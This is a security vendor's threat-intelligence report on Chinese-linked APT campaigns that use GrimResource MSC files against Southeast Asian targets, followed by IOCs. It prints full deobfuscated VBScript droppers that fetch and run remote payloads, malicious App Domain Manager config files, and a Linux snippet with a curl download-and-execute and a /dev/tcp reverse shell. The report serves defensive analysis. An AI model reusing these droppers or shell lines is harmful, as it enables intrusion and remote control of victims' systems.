Over the past few months, TG Soft's C.R.A.M. has been monitoring different threat actors abusing MSC files.
The first APT group to use .MSC files in their attacks was #Kimsuky in April 2024, as reported by company Genians.
In May 2024, the use of this technique was also observed by the APT group known as #MustangPanda, which carries the #PlugX malware as reported by NTT.
In June 2024, the abuse of .MSC files was detected with the vulnerability called #GrimResource as reported by Elastic.
TG Soft's C.R.A.M. continued to monitor the situation in the following months, identifying new malware campaigns carried out by an unknown cyber-actor that is most likely of Chinese origin to target Southeast Asia.
Below is the timeline of the monitored attacks:
The first campaign we analyzed is that of August 2, 2024.
[upd 2024-08-26 -> The timeline has been updated: the campaign identified on 2024/08/23 was delivered on 2024/08/19]
[upd 2024-09-16 -> The timeline has been updated: added the campaign of 2024/09/14]
Campaign Analysis
Campaign of August 2, 2024
On August 2, 2024, an email campaign was released with the following file attached:
水域污染詳細訊息.msc
Translating the file name from Chinese to english, the document refers to:
Detailed information on water pollution.msc
The image of the infection chain is shown in the figure:
The MSC file via the vulnerability known as
GrimResource automatically executes the following script:
Decripting it gives the following more readable script:
Option Explicit
Dim objShell, objFSO, objHTTP
Dim strURL1, strURL2, strURL3, strShowfileURL
Dim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath
Dim strExecutablePath
strURL1 = "https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/oncesvc.exe"
strURL2 = "https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/oncesvc.exe.config"
strURL3 = "https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/water.txt"
strShowfileURL = "https[:]//wordpresss-data[.]s3.me-south-1[.]amazonaws[.]com/ws.pdf"
strDownloadPath1 = "C:\Users\Public\oncesvc.exe"
strDownloadPath2 = "C:\Users\Public\oncesvc.exe.config"
strDownloadPath3 = "C:\Users\Public\water.txt"
strShowfilePath = "C:\Users\Public\wrasb.pdf"
strExecutablePath = "C:\Users\Public\oncesvc.exe"
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
If Not objFSO.FileExists(strDownloadPath1) Then
DownloadFile strURL1, strDownloadPath1
End If
If Not objFSO.FileExists(strDownloadPath2) Then
DownloadFile strURL2, strDownloadPath2
End If
If Not objFSO.FileExists(strDownloadPath3) Then
DownloadFile strURL3, strDownloadPath3
End If
If Not objFSO.FileExists(strShowfilePath) Then
DownloadFile strShowfileURL, strShowfilePath
End If
objShell.Run strExecutablePath, 1, True
objShell.Run strShowfilePath, 1, True
Sub DownloadFile(url, path)
Dim objStream
Set objStream = CreateObject("ADODB.Stream")
objHTTP.Open "GET", url, False
objHTTP.Send
If objHTTP.Status = 200 Then
objStream.Open
objStream.Type = 1 ' adTypeBinary
objStream.Write objHTTP.ResponseBody
objStream.SaveToFile path, 2 ' adSaveCreateOverWrite
objStream.Close
End If
Set objStream = Nothing
End Sub |
The script downloads the following files into the C:\Users\Public folder:
- oncesvc.exe (Microsoft legitimate file "ClickOnce")
- oncesvc.exe.config (Configuration file to load malicious DLL)
- water.txt (Unused file, probably to track infection)
- ws.pdf (Decoy)
Below we see the images of the decoy PDF file:
The oncesvc.exe.config file contains the following configuration:
<configuration>
<runtime>
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<dependentAssembly>
<assemblyIdentity name="oncesvc" publicKeyToken="205fcab1ea048820" culture="neutral" />
<codeBase version="0.0.0.0" href="https[:]//360photo[.]oss-cn-hongkong[.]aliyuncs[.]com/202407111985.jpeg"/>
</dependentAssembly>
</assemblyBinding>
<etwEnable enabled="false" />
<appDomainManagerAssembly value="oncesvc, Version=0.0.0.0, Culture=neutral, PublicKeyToken=205fcab1ea048820" />
<appDomainManagerType value="oncesvc" />
</runtime>
</configuration> |
which allows to load the malicious DLL from the address https[:]//360photo[.]oss-cn-hongkong[.]aliyuncs[.]com/202407111985.jpeg through the App Domain Manager Injection technique.
The malicious DLL that is executed by the ONCESVC.EXE process, download from the site https[:]//360photo[.]oss-cn-hongkong[.]aliyuncs[.]com/202407111522.jpeg a completely diskless 64-bit shellcode.
In the figure we can see the decryption of the obfuscated URL with AES and the execution of the downloaded shellcode thread:
The shellocode uses a custom
DBJ2 algorithm to determine the hash of the API names to use, as we see in the figure:
The 64bit shellcode connects to domain status[.]s3cloud-azure[.]com on the port 8080 at the page:
/common/oauth2/authorize?client_id=<ID del cliente>
by sending the following request via post:
{"user":"password"}
The following information is sent in base 64 in the client_id field:
- username with an indication of whether it is Administrator (isAdmin)
- PC name
- process name
- indication of the architecture of the operating system (32 or 64 bit)
- system memory
Then the shellcode calls the following page: /api/v1/homepage/<id>
If the answer you get is different from:
then a new shellcode is executed as we see in the figure:
During the analysis the shellcode downloaded and executed a third stage containing the Marte Beacon with CobaltStrike which connected to the site: static[.]trendmicrotech[.]com with 8443 port (ipv6: 2a06:98c1:3120:0:0:0:0:7) at the pages:
- GET /etc.clientlibs/microsoft/clientlibs/clientlib-mwf-new/resources/fonts.
- POST /OneCollector/1.0
This version of CobaltStrike created the following pipe:
\\.\pipe\srvsvc-1-5-5-067b62
The August 2 campaign targeted the Taiwan government as reported by
StrikeReady_Labs
Campaign of July 16, 2024
On July 16, 2024, the file
Cert.msc was uploaded to Virus Total from Vietnam .
It is assumed that this is the first campaign used by the threat actor exploiting the grim resource technique.
The MSC file contains an obfuscated script from which the following is obtained:
Option Explicit
Dim objShell, objFSO, objHTTP
Dim strURL1, strURL2
Dim strDownloadPath1, strDownloadPath2
Dim strExecutablePath
strURL1 = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe"
strURL2 = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe.config"
strDownloadPath1 = "C:\Users\Public\Music\Cert.exe"
strDownloadPath2 = "C:\Users\Public\Music\Cert.exe.config"
strExecutablePath = "C:\Users\Public\Music\Cert.exe"
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
If Not objFSO.FileExists(strDownloadPath1) Then
DownloadFile strURL1, strDownloadPath1
End If
If Not objFSO.FileExists(strDownloadPath2) Then
DownloadFile strURL2, strDownloadPath2
End If
objShell.Run strExecutablePath, 1, True
Sub DownloadFile(url, path)
Dim objStream
Set objStream = CreateObject("ADODB.Stream")
objHTTP.Open "GET", url, False
objHTTP.Send
If objHTTP.Status = 200 Then
objStream.Open
objStream.Type = 1 ' adTypeBinary
objStream.Write objHTTP.ResponseBody
objStream.SaveToFile path, 2 ' adSaveCreateOverWrite
objStream.Close
End If
Set objStream = Nothing
End Sub |
The script inside the MSC file downloads the following files:
- https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe.config
- https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe
- https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/ServiceHub.json
- https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/205fcab1ea04882.jpg
The following files were not available during the analysis:
The Cert.exe file should have been the ServiceHub.Host.netfx.x64.exe program.
The Cert.exe.config file contains the following configuration:
<configuration>
<runtime>
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<dependentAssembly>
<assemblyIdentity name="ServiceHub" publicKeyToken="205fcab1ea048820" culture="neutral" />
<codeBase version="0.0.0.0" href="https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/ServiceHub.json"/>
</dependentAssembly>
</assemblyBinding>
<etwEnable enabled="false" />
<appDomainManagerAssembly value="ServiceHub, Version=0.0.0.0, Culture=neutral, PublicKeyToken=205fcab1ea048820" />
<appDomainManagerType value="ServiceHub" />
</runtime>
</configuration> |
It is assumed that the ServiceHub.json file is the malicious DLL that is loaded through the App Domain Manager Injection technique and the 205fcab1ea04882.jpg file instead directly contains the Marte Beacon with CobaltStrike that connected to the site: us2[.]s3bucket-azure[.]online (ipv6: 2a06:98c1:3120:0:0:0:0:7) at the page "/etc.clientlibs/microsoft/clientlibs/clientlib-mwf-new/resources/fonts"
The July 16, 2024 campaign did not use the 64-bit shellcode seen in the August 2 campaign, but instead directly executed the Marte Beacon with Cobalt Strike, as shown in the figure.:
Campaign of August 12, 2024
On August 12, 2024, the file
Document_new.pdf.msc was uploaded to Virus Total from Vietnam.
The MSC file contains an obfuscated script from which the following is obtained:
Option Explicit
Dim objShell, objFSO, objHTTP
Dim strURL1, strURL2, strURL3, strShowfileURL
Dim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath
Dim strExecutablePath
strURL1 = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/a85f760d1f9cd374.json"
strURL2 = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/a85f760d1f9cd374.config"
strURL3 = "https[:]//yitoo[.]oss-cn-hongkong[.]aliyuncs[.]com/calc.exe"
strShowfileURL = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Document_new.pdf"
strDownloadPath1 = "C:\Windows\Temp\Service.exe"
strDownloadPath2 = "C:\Windows\Temp\Service.exe.config"
strDownloadPath3 = "C:\Users\Public\win.ini"
strShowfilePath = "C:\Users\Public\Documents\Documents.pdf"
strExecutablePath = "C:\Windows\Temp\Service.exe"
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
If Not objFSO.FileExists(strDownloadPath1) Then
DownloadFile strURL1, strDownloadPath1
End If
If Not objFSO.FileExists(strDownloadPath2) Then
DownloadFile strURL2, strDownloadPath2
End If
If Not objFSO.FileExists(strDownloadPath3) Then
DownloadFile strURL3, strDownloadPath3
End If
If Not objFSO.FileExists(strShowfilePath) Then
DownloadFile strShowfileURL, strShowfilePath
End If
objShell.Run strExecutablePath, 1, False
objShell.Run strShowfilePath, 1, False
Sub DownloadFile(url, path)
Dim objStream
Set objStream = CreateObject("ADODB.Stream")
objHTTP.Open "GET", url, False
objHTTP.Send
If objHTTP.Status = 200 Then
objStream.Open
objStream.Type = 1 ' adTypeBinary
objStream.Write objHTTP.ResponseBody
objStream.SaveToFile path, 2 ' adSaveCreateOverWrite
objStream.Close
End If
Set objStream = Nothing
End Sub |
The only component we had access to was the calc.exe file, which was stored inside the public folder under the name win.ini.
During the analysis, it was not possible to recover most of the files used in the attack..
Campaign of August 15, 2024
On August 15, 2024, the file
readme(解压密码).msc was uploaded to Virus Total
The MSC file contains an obfuscated script from which the following output is obtained:
Option Explicit
Dim objShell, objFSO, objHTTP
Dim strURL1, strURL2, strURL3, strShowfileURL
Dim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath
Dim strExecutablePath
strURL1 = "https[:]//app-dimensiona[.]s3[.]sa-east-1[.]amazonaws[.]com/oncesvc.exe"
strURL2 = "https[:]//bjj-files-production[.]s3[.]sa-east-1[.]amazonaws[.]com/msedge.dll"
strURL3 = "https[:]//app-dimensiona[.]s3[.]sa-east-1[.]amazonaws[.]com/oncesvc.exe.config"
strShowfileURL = "https[:]//app-dimensiona[.]s3[.]sa-east-1[.]amazonaws[.]com/readme.docx"
strDownloadPath1 = "C:\Users\Public\oncesvc.exe"
strDownloadPath2 = "C:\Users\Public\msedge.dll"
strDownloadPath3 = "C:\Users\Public\oncesvc.exe.config"
strShowfilePath = "C:\Users\Public\readme.docx"
strExecutablePath = "C:\Users\Public\oncesvc.exe"
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
If Not objFSO.FileExists(strDownloadPath1) Then
DownloadFile strURL1, strDownloadPath1
End If
If Not objFSO.FileExists(strDownloadPath2) Then
DownloadFile strURL2, strDownloadPath2
End If
If Not objFSO.FileExists(strDownloadPath3) Then
DownloadFile strURL3, strDownloadPath3
End If
If Not objFSO.FileExists(strShowfilePath) Then
DownloadFile strShowfileURL, strShowfilePath
End If
objShell.Run strExecutablePath, 1, True
objShell.Run strShowfilePath, 1, True
Sub DownloadFile(url, path)
Dim objStream
Set objStream = CreateObject("ADODB.Stream")
objHTTP.Open "GET", url, False
objHTTP.Send
If objHTTP.Status = 200 Then
objStream.Open
objStream.Type = 1 ' adTypeBinary
objStream.Write objHTTP.ResponseBody
objStream.SaveToFile path, 2 ' adSaveCreateOverWrite
objStream.Close
End If
Set objStream = Nothing
End Sub |
This campaign is similar to the one on August 2nd, where the oncesvc.exe file is used to load the malicious DLL downloaded from: https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/af7ffc2a629a1c258336fde8a1f71e0a.json.
Malicious DLL downloads 64-bit shellcode from https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/2472dca8c48ab987e632e66caabf86502bf3.xml.
The 64-bit shellcode is similar to the one seen on August 2nd, the command and control server in this case is
api[.]s2cloud-amazon[.]com.
The post used in this case is:
{"user":"password1"}, slightly different than the August 2 campaign.
Again the shellcode downloaded the Marte Beacon with Cobalt Strike, which turned out to be the same version seen in the August 2 campaign..
Campaign of August 20, 2024
On August 20, 2024, the file "
Hướng dẫn và yêu cầu kiểm tra, giám sát hoạt động của từng đơn vị năm 2024.msc" was uploaded to Virus Total.
The campaign targets Vietnam, translating the file name from Vietnamese would be "Instructions and requirements for inspection and supervision of the activities of each unit in 2024
.msc"
The MSC file is similar to those seen in previous campaigns, the ONCESVC.EXE file is replaced with MUSICV.EXE.
The configuration file is the same as seen in the August 15 campaign, the same 64-bit shellcode is downloaded and the same Marte Beacon with Cobalt Strike.
Interesting is the decoy displayed on theme "
Vietnam Oil and Gas":
Campaign of August 19, 2024
On August 23, 2024, the file "
贵州电视台张青副台长腐败内部视频证据.msc" was uploaded to Virus Total.
The campaign may be targeting France and was delivered on August 19, 2024, as the file name translated from Chinese would be "Internal Video Evidence of Corruption of Deputy Director Zhang Qing of Guizhou TV Station.msc".
The MSC file is similar to the one seen in the previous campaign on August 20, where the MUSICV.EXE program is used.
During the analysis, it was not possible to download the malicious DLL from the link https://speedshare.oss-cn-hongkong.aliyuncs[.]com/af7ffc2a629a1c258336fde8a1f71e0a.json. The link is the same as the campaign of August 20th.
The MSC file contains an obfuscated script from which the following output is obtained:
Option Explicit
Dim objShell, objFSO, objHTTP
Dim strURL1, strURL2, strURL3, strShowfileURL
Dim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath
Dim strExecutablePath
strURL1 = "https[:]//proradead[.]s3[.]sa-east-1[.]amazonaws[.]com/new.exe"
strURL2 = "https[:]//proradead[.]s3[.]sa-east-1[.]amazonaws[.]com/new.exe.config"
strURL3 = "https[:]//proradead[.]s3[.]sa-east-1[.]amazonaws[.]com/new.txt"
strShowfileURL = "http[:]//152[.]42[.]226[.]161/stime/1x.mp4"
strDownloadPath1 = "C:\Users\Public\Music\musicx.exe"
strDownloadPath2 = "C:\Users\Public\Music\musicx.exe.config"
strDownloadPath3 = "C:\Users\Public\Music\music.txt"
strShowfilePath = "C:\Users\Public\proton.mp4"
strExecutablePath = "C:\Users\Public\Music\musicx.exe"
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
If Not objFSO.FileExists(strDownloadPath1) Then
DownloadFile strURL1, strDownloadPath1
End If
If Not objFSO.FileExists(strDownloadPath2) Then
DownloadFile strURL2, strDownloadPath2
End If
If Not objFSO.FileExists(strDownloadPath3) Then
DownloadFile strURL3, strDownloadPath3
End If
If Not objFSO.FileExists(strShowfilePath) Then
DownloadFile strShowfileURL, strShowfilePath
End If
objShell.Run strExecutablePath, 1, False
objShell.Run strShowfilePath, 1, False
Sub DownloadFile(url, path)
Dim objStream
Set objStream = CreateObject("ADODB.Stream")
objHTTP.Open "GET", url, False
objHTTP.Send
If objHTTP.Status = 200 Then
objStream.Open
objStream.Type = 1 ' adTypeBinary
objStream.Write objHTTP.ResponseBody
objStream.SaveToFile path, 2 ' adSaveCreateOverWrite
objStream.Close
End If
Set objStream = Nothing
End Sub |
Below we see some screenshots of the decoy video downloaded from
http://152.42.226[.]161/stime/1x.mp4
Inside the ZIP file sent via email containing the file 贵州电视台张青副台长腐败内部视频证据.msc the file 贵州电视台内部领导张青副台长腐败内幕.docx is also present, which we see below:
Other campaigns in April and May 2024
The analysis of the third stage of the Marte Beacon with Cobalt Strike has allowed us to associate the threat actor with three other campaigns launched between April and May:
- 27 aprile 2024 (Philippines)
- 7 maggio 2024 (Philippines)
- 17 maggio 2024 (Vietnam)
These campaigns did not abuse MSC files to be distributed.
The Marte Beacon with Cobalt Strike could be located from the following url: http://43.199.33[.]246:443/payload.bin
Analyzing the IP 43.199.33[.]246 The April 27 campaign was detected through the executable file named x1ffjiqd.exe, which downloaded and executed the following files:
- http://43.199.33[.]246:443/payload.bin
- http://43.199.33[.]246:443/example.pdf
The payload.bin file is the Marte Beacon with Cobalt Strike with C&C server visualstudio-microsoft[.]com and port 443.
The following decoy was used in the April 27 campaign:
The following decoy was used in the May 7 campaign:
In the May 17 campaign the following decoy was used with the name example.docx:
The IP address 43.199.33[.]246 is also associated with an ELF file (Linux) that downloads a backdoor as we can see from the code snippet below:
whoami > /tmp/test
curl -o /tmp/google_usb_ssh -s https[:]//xianggang000[.]oss-cn-hongkong[.]aliyuncs[.]com/linshi/grrond
chmod 777 /tmp/google_usb_ssh
/tmp/google_usb_ssh
rm /tmp/google_usb_ssh
bash -i >& /dev/tcp/43[.]199[.]33[.]246/4433 0>&1
wget https[:]//download[.]chrorne[.]com/error.logs
gedit error.logs /dev/null -c /bin/sh |
The cybercriminal probably needed to hit a target with a Linux OS. This bash script is similar in behavior to the VisualBasic script used inside MSC files for Windows. In this case the decoy is the display of an email message contained in the "error.logs" file.
Conclusions
The campaigns appear to primarily target government agencies and critical infrastructure in Southeast Asia. With particular focus on the following countries: Philippines, Vietnam, and Taiwan.
From August 2nd onwards, the threat actor inserted a new module into its infection chain containing a 64-bit shellcode which then leads to the execution of a third stage with the Marte and Cobalt Strike beacons.
The modus operandi of the cyber actor reflects the techniques of APTs of Chinese origin, it has been noted that the group is operational from Monday to Friday in hours compatible with Chinese ones.
Although it was not possible to make a precise attribution, it could be a subgroup of
APT41.
IOC
fb640cfb9a86b9dc6806b048c6a88ef6ff546ca830a147322b4e3a3646b70942
eaae358c15ea26a976804a398c3fc2c25b37db0c89f09307e33cfc9ebcfba1d0
ebebe25dc22fecceb27c390ce77059ade8188be71e340a1e7b098cb3b73ba855
4edc77c3586ccc255460f047bd337b2d09e2339e3b0b0c92d68cddedf2ac1e54
04b336c3bcfe027436f36dfc73a173c37c66288c7160651b11561b39ce2cd25e
c78a02fa928ed8f83bda56d4b269152074f512c2cb73d59b2029bfc50ac2b8bc
4887fdb5bd5a59fa1754415dd818d455567cf6fe65fbeb7fbdbbe5b018bc3713
633f5b27245a92b38d114aef292a485650bda737785d8a186b43cba8dc3969ca
1c13e6b1f57de9aa10441f63f076b7b6bd6e73d180e70e6148b3e551260e31ee
e7c58c2e315be01bd3a279c134e471ccf28046f67604b901279594dc5269a0f1
ca05513c365c60a8fdabd9e21938796822ecda03909b3ee5f12eb82fefa34d84
f1d519f43c36e24a89b351f00059a1bdb9afc2a339f7301117babb484e2cc555
159d13989d0ae44fddb7b1d4c331f1040d187693f16daa138c651f2cc9b7f6d3
a0d662b1765301f38b17b861893d282005d821139524d583ec0cd4ccfc5cd43c
8542ee752ef2ee498e106c0a6ddc4a9810320d14fd85a857520b19d02db46903
1e6c661d6981c0fa56c011c29536e57d21545fd11205eddf9218269ddf53d448
257fa5c998d2117cc38452e6cbd2bf17b507c98ee492b246de6dcbc784585263
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
59171a541712e089dffee2336ec908aec856a38c4b7fbd74cc7a32fb698bc03e
333ed1e77dd0ae502dd73ea029957cb015e770cabad3e090ab3db659769f86af
9228d8ad3acec40e5d328f2b3ef4107fbe49107a85eb850c900b516520a1cb20
a725be0997035e10e059f8f3141a12f836aaca13e364cfa588ea548ec38d9498
status[.]s3cloud-azure[.]com
static[.]trendmicrotech[.]com:8443
api[.]s2cloud-amazon[.]com:8080
us2[.]s3bucket-azure[.]online:443
visualstudio-microsoft[.]com:443
43[.]199[.]33[.]246:443
Authors:
Ing. Gianfranco Tonello, Michele Zuin